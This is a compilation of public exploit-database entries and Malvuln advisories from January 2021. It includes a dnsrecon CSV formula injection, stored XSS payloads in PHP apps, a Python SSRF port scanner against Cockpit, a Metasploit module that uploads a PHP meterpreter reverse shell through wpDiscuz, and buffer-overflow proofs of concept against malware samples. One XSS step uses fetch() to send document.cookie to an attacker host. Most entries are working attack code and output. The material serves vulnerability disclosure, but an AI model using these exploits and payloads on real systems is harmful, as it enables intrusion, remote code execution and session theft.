# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
# Version : 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:

_spf.example.com       "test',=1+1337,'z"


user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
[*] Performing General Enumeration of Domain: _spf.example.com
[-] DNSSEC is not configured for _spf.example.com
[*]    SOA ns-59.awsdns-07.com 205.1.1.1
[-] Could not Resolve NS Records for _spf.example.com
[-] Could not Resolve MX Records for _spf.example.com
[*]    TXT _spf.example.com test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}


This output will then be rewritten into a CSV with this structure:

Type,Name,Address,Target,Port,String
SOA,ns-59.awsdns-07.com,205.1.1.1
TXT,_spf.example.com,,,,'test',=1+1337,'z'

The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:

Attribute Values
  All printable ASCII characters are permitted in the attribute value.

# Exploit Title: Online Doctor Appointment System  1.0 -  Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2021-01-08
# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1

Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
Step 2: then Click on the username and go to profile
Step 3: Click on Update profile.
Step 4: Input "<script>alert("craniums")</script>"  in the field First Name,Last Name and Address.
Step 5: This Will trigger the payload each time you update or visit a new page.

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/bba63df41adcf2cf80c74e4a62539d44.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Agent.dcbh
Vulnerability: Insecure Permissions EoP
Description: Drops an executable with a randomly generated numeric name E.g. 674_674.exe. Change permissions are granted to authenticated users, allowing privilege escalation.
Type: PE32
MD5: bba63df41adcf2cf80c74e4a62539d44
Vuln ID: MVID-2021-0016
Dropped files: Random numeric named .EXE under c:\ dir.
Disclosure: 01/08/2021

Exploit/Poc:
C:\>cacls C:\989_989.exe
C:\989_989.exe BUILTIN\Administrators:(ID)F
               NT AUTHORITY\SYSTEM:(ID)F
               BUILTIN\Users:(ID)R
               NT AUTHORITY\Authenticated Users:(ID)C


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
# Date: 08.01.2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://cockpit-project.org/
# Version: v234
# Tested on: Ubuntu 18.04

#!/usr/bin/python3
import argparse
import requests
import sys
import urllib3
import time
from colorama import Fore, Style
from argparse import ArgumentParser, Namespace
from bs4 import BeautifulSoup

"""
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
Example scanning for loopback interface of server: 
python3 PoC.py --target 192.168.1.33:9090 
Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
"""

def main():
    dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
    parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
    parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
    parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
    parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
    args: Namespace = parser.parse_args()

    if args.target:
        target = args.target
        if args.scan:
            scan = args.scan
            if args.ports:
                ports = args.ports
            else:
                ports = "22"
        else:
            scan = "127.0.0.1"
            if args.ports:
                ports = args.ports
            else:
                ports = "22"
        cockpitReq(target, scan, ports)

def cockpitReq(target, scan, ports):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    portRange = ports.split(",")
    for unsafe in portRange:
        headers = {
"Host": str(target),
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Authorization": "Basic dW5zYWZlOmlubGluZQ==",
"X-Authorize": "",
"Connection": "close",
"Cookie": "cockpit=deleted",
        }
        req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False)
        time.sleep(2)
        soup = BeautifulSoup(req.text, 'html.parser')
        responseCode = req.status_code
        responseTime = str(req.elapsed)

        if responseCode == 404:
            print("Cockpit server was not found!")
        elif responseCode == 401:
            if soup.title.string == "Authentication failed":
                print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
            elif soup.title.string == "Authentication failed: no-host":
                if responseTime > "0:00:10.000000":
                  print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
                else:
                  print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
            else:
                print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
                print("[-] One bad day!")
                sys.exit(1)
        else:
            print("Something went wrong!")

main()

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/7bd93c10c9373cfc2bcc8eff712631f1.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Xtreme.yvp
Vulnerability: Insecure Permissions EoP
Description: Change permissions are granted to authenticated users, allowing privilege escalation.
Type: PE32
MD5: 7bd93c10c9373cfc2bcc8eff712631f1
Vuln ID: MVID-2021-0017
Dropped files: System.exe
Disclosure: 01/08/2021

Exploit/PoC:
C:\>cacls C:\SystemG\System.exe
C:\SystemG\System.exe BUILTIN\Administrators:(ID)F
                      NT AUTHORITY\SYSTEM:(ID)F
                      BUILTIN\Users:(ID)R
                      NT AUTHORITY\Authenticated Users:(ID)C


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HTTP::Wordpress
    include Msf::Exploit::FileDropper

    def initialize(info = {})
        super(update_info(info,
'Name'           => 'WordPress wpDiscuz Unauthen File Upload Vulnerability',
'Description'    => %q{
            This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
            version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
            including PHP files, and achieve remote code execution on a vulnerable site’s server.
          },
'Author'         =>
            [
'Chloe Chamberland', # Vulnerability Discovery, initial msf module
'Hoa Nguyen - SunCSR'  # Metasploit Module Pull Request
            ],
'License'        => MSF_LICENSE,
'References'     =>
            [
              ['WPVDB', '10333'],
              ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
              ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
              ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
            ],
'Privileged'     => false,
'Platform'       => 'php',
'Arch'           => ARCH_PHP,
'Targets'        => [['wpDiscuz < 7.0.5', {}]],
'DisclosureDate' => 'Feb 21 2020',
'DefaultOptions' =>
          {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
          },
'DefaultTarget'  => 0))

      register_options [
        OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]),
    ]
    end

    def check
        check_plugin_version_from_readme('wpdiscuz','7.0.5')
    end

    def blogpath
        datastore['BLOGPATH']
    end

    def find_wmusecurity_id
      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5)
      wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
      return wmusecurity_id
    end

    def exploit
        wmusecurity_id = find_wmusecurity_id[0]
        php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
        data = Rex::MIME::Message.new
        data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
        data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
        data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
        data.add_part('1', nil, nil, 'form-data; name="postId"')
        data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
        post_data = data.to_s

        res = send_request_cgi(
'uri'       => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'),
'method'    => 'POST',
'ctype'     => "multipart/form-data; boundary=#{data.bound}",
'data'      => post_data
        )

        time = Time.new
        year = time.year.to_s
        month = "%02d" % time.month

        regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
        wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"")

        if res
          if res.code == 200 && res.body =~ /#{php_page_name}/
            print_good("Payload uploaded as #{php_page_name}")
            register_files_for_cleanup(php_page_name)
          else
            fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Server did not answer")
        end

        print_status("Calling payload...")
        send_request_cgi(
          { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)},
          5
        )

    end
end

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NinjaSpy.c
Vulnerability: Remote Stack Buffer Overflow
Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payload of characters we can cause buffer overflow.

Type: PE32
MD5: 6eece319bc108576bd1f4a8364616264
Vuln ID: MVID-2021-0018
Dropped files: cmd.dll
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

Memory Dump:
0:000> .ecxr
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
cmd+0x40f57:
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0 ds:002b:414142c1=????????

FAULTING_IP: 
cmd+40f57
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00440f57 (cmd+0x00040f57)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 414142c1
Attempt to read from address 414142c1

PROCESS_NAME:  cmd.dll

OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  414142c1

READ_ADDRESS:  414142c1 

FOLLOWUP_IP: 
cmd+40f57
00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014f4

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 764ee0bb to 00440f57

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b
0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be
0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3
0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a
0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d
0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f
0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be
0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137
0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b
0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b
0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac
0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  cmd+40f57

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: cmd

IMAGE_NAME:  cmd.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  2a425e19

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=2004
c=1
JUNK="A"*8601
AMT=10
PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+ "Accept-Charset: "+JUNK

def doit():
    global c, JUNK, PAYLOAD, AMT
    while True:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.send(PAYLOAD)
        s.close()
        c+=1
        if c==AMT:
            print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")
            print("MD5: 6eece319bc108576bd1f4a8364616264")
            print("By Malvuln")
            exit()

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/9d7be3799594a82bf7056905f501af03.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ketch.b
Vulnerability: Remote Stack Buffer Overflow

Description: Makes HTTP GET request for a file "script.dat", and writes the server response to temporary file named "watchb.tmp" under c:\Windows dir.
At 1032 bytes we overwrite the buffer which is about 1000 bytes, and sending 1,512 bytes we overwrite EIP. The watchb.tmp holds the response from the server.

Type: PE32
MD5: 9d7be3799594a82bf7056905f501af03
Vuln ID: MVID-2021-0019
Dropped files: watchb.tmp
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

C:\>type \Windows\watchb.tmp
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq...

Payload gets XOR's complicating things, uppercase gets converted to lowercase, "a" becomes 51 Q... "A" becomes q 71 so it is difficult to control chars for our needs.
Therefore, if we want to see the typical 41414141 exploit pattern overwriting EIP we would have to use the lowercase "q" character. After when it is XOR with 30
it will become 41.

At offset 004014CE, is where our payload is XOR'd with value of 30, and this would have to be taken into account.
004014CE | E8 5D FF FF FF    | call backdoor.win32.ketch.b

Reversing the code responsible for payload character conversions e.g. "a" to "Q" and "q" to "A" which challenges exploitation.

movzx eax, al (al=BA)
push esi
mov esi, dword ptr ss[esp+10]  (dword ptr [esp+10]=[0019E7F8]=0)
sub edx, esi
sub eax, esi
xor eax, edx  (eax=BA, edx=BE)
al of EAX is now 4 - EAX 00000004
EDX = BABECAFE
mov edx, ecx
sar edx, 8 
EDX is now, edx=FFBABECA
movzx edx, dl
EDX is now value CA
sub edx, dl
movzx ecx, cl (cl=FE)
xor eax, edx (EAX=30, edx=CA)
sub ecx, esi (ecx=FE, esi=0)
xor eax, ecx (eax=CE, edx=FE)
EDX =CA
mov ecx, dword ptr ss[esp+8]
movzx edx, byte ptr ds[ecx] (byte ptr [yte ptr [ecx]=[0019E824]=61 'a')
xor eax, edx (eax=30 '0', edx=61 'a')  <==================================== HERE 
cmp eax, A  ('\n') EAX = 51 'Q'
pop esi (esi=0)
je backdoor.win32.ketch
test eax, eax (eax=51)
je backdoor.win32.ketch (jump not taken)
mov byte ptr ds[ecx], al (lower value of EAX 00000051)
ret

Memory Dump:

0:000> !exchain
0019f1c8: ntdll!_except_handler4+0 (773d6a50)
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (774157ad)
0019f80c: Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+35020 (00435020)
0019fe24: 41414141
Invalid exception stack at 41414141

(16d0.118c): Stack buffer overflow - code c0000409 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=029044e1 edx=001a0000 esi=00000000 edi=00000002
eip=773ced3c esp=0019f110 ebp=0019f150 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400          ret     14h
0:000> .ecxr

eax=00000041 ebx=0290065c ecx=029044e1 edx=001a0000 esi=000005ef edi=02903f00
eip=004050a9 esp=0019f7c0 ebp=0019f958 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9:
004050a9 8802            mov     byte ptr [edx],al          ds:002b:001a0000=41
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+50a9
004050a9 8802            mov     byte ptr [edx],al

EXCEPTION_RECORD:  0019f310 -- (.exr 0x19f310)
ExceptionAddress: 004050a9 (Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x000050a9)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000008
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 001a0000
Attempt to write to address 001a0000

PROCESS_NAME:  Backdoor.Win32.Ketch.b.9d7be3799594a82bf7056905f501af03.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019f360 -- (.cxr 0x19f360)
eax=00000041 ebx=0290065c ecx=029044e1 edx=001a0000 esi=000005ef edi=02903f00
eip=004050a9 esp=0019f7c0 ebp=0019f958 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9:
004050a9 8802            mov     byte ptr [edx],al          ds:002b:001a0000=41
Resetting default scope

WRITE_ADDRESS:  001a0000 

FOLLOWUP_IP: 
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+50a9
004050a9 8802            mov     byte ptr [edx],al

FAULTING_THREAD:  0000118c

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

IP_ON_HEAP:  029032f0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER:  from 029032f0 to 004050a9

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f958 029032f0 fffffffe 774453ea 773f67ea Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9
0019f960 774453ea 773f67ea 000005e8 000005ef 0x29032f0
0019f9c4 7674a402 00000000 00000000 00000000 ntdll!RtlDebugAllocateHeap+0x340
0019fa9c 41414141 41414141 41414141 41414141 KERNELBASE!LocalBaseRegQueryValue+0x202
0019fab0 41414141 41414141 41414141 41414141 0x41414141
0019fab4 41414141 41414141 41414141 41414141 0x41414141
0019fab8 41414141 41414141 41414141 41414141 0x41414141


Exploit/PoC:
Setup for attacker server where we control traffic.

python -c "print 'q'*1512"> script.dat

python -m SimpleHTTPServer 80


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-10
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34 

Affected parameter: "full name", "location"

Proof of concept:

1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
2. Click on "Deceased Persons"
3. Choose one of the users and click on their names to edit it
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>

To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:

POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
Upgrade-Insecure-Requests: 1

PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=

And forward the request. The cookie values will be displayed on screen.

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6a2d09c4527cf222e4e2571b074fcc0c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Levelone.a
Vulnerability: Remote Stack Buffer Overflow 
Description: The malware listens on Port 1500, sending a specially crafted HTTP TRACE request causes a buffer overflow and overwrites EIP with our payload. If testing you need delete the executable in order to run the malware again, c:\>del \Windows\SysWOW64\dllvector.exe
Packed with UPX so just upx -d to unpack.

Type: PE32
MD5: 6a2d09c4527cf222e4e2571b074fcc0c
Vuln ID: MVID-2021-0020
Dropped files: dllvector.exe
Network Access: Remote
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/10/2021

Memory Dump:

EAX : 000A139C
EBX : 0019FF70
ECX : 0040109A     dllvector.0040109A
EDX : 773E9D70     ntdll.773E9D70
EBP : 000A13A4
ESP : 000A1380
ESI : FFFFFFFF
EDI : 0040801C     dllvector.0040801C
EIP : 41414141


41414141 ??              ???

EXCEPTION_RECORD:  0019f7e8 -- (.exr 0x19f7e8)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME:  dllvector.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

